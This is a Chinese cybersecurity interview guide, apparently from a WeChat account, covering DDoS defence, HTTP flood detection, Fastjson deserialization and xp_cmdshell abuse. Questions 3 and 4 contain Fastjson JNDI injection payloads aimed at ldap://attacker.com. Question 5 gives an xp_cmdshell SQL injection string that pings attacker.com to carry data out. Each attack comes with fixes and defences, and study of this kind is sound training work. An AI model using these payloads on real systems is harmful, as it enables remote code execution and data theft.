《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

上难度

问题1：
设计抗DDoS方案时，如何在网络层、传输层、应用层分别部署防护？各列举2项关键技术。

答案：

• 网络层：BGP AnyCast分流、SYN Cookie防御

• 传输层：TCP速率限制、连接状态检测（如FIN包验证）

• 应用层：JavaScript Challenge、行为分析（如鼠标移动频率）

问题2：
如何通过Nginx日志分析识别HTTP Flood攻击？给出至少3个关键指标及对应阈值设置逻辑。

答案：

1. 请求频率：单IP > 1000次/分钟（基线动态调整）

2. User-Aent分布：异常集中（如90%请求使用相同UA）

3. URL熵值：大量随机路径请求（如/asdf1234）

4. 响应码比例：高比例404/400（扫描特征）

问题3：
分析Fastjson 1.2.24反序列化漏洞利用条件，给出利用JdbcRowSetImpl的完整Payload及修复方案。

答案：

• Payload：

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true
}

• 修复：

  1. 升级至1.2.25+并启用safeMode

  2. 配置ParserConfig.getGlobalInstance().addDeny("com.sun.rowset")

问题4：
Fastjson 1.2.68修补了AutoType绕过漏洞，请解释攻击者如何通过异常抛出机制绕过黑名单检测。

答案：

• 绕过原理：

  1. 利用java.lang.Exception子类中的@type字段触发反序列化

  2. 异常类加载时绕过checkAutoType()检查

• Payload示例：

{"@type":"java.lang.Exception","@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/exp","autoCommit":true
}

问题5：
某系统允许通过SQL语句调用存储过程，如何利用xp_cmdshell实现RCE？说明防御的多层方案。

答案：

• 攻击步骤：

  1. 注入语句：'; EXEC master..xp_cmdshell 'ping attacker.com'--

  2. 通过DNS或ICMP外带数据

• 防御方案：

  1. 数据库层：禁用xp_cmdshell、最小权限运行

  2. 应用层：输入过滤（如禁用EXEC关键字）

  3. 网络层：出站流量监控

问题：
设计抗DDoS方案时，如何保障核心业务在500Gbps流量攻击下的可用性？需包含架构设计及应急响应流程。

答案：

• 架构设计：

  1. 流量清洗中心：AnyCast+GRE隧道引流

  2. 多CDN动态调度（如Cloudflare+Akamai）

  3. 业务降级：静态页面回退、非核心服务限流

• 应急流程：

  1. 实时监控触发阈值（如95%带宽占用）

  2. 自动切换至清洗中心

  3. 人工分析攻击特征更新防护规则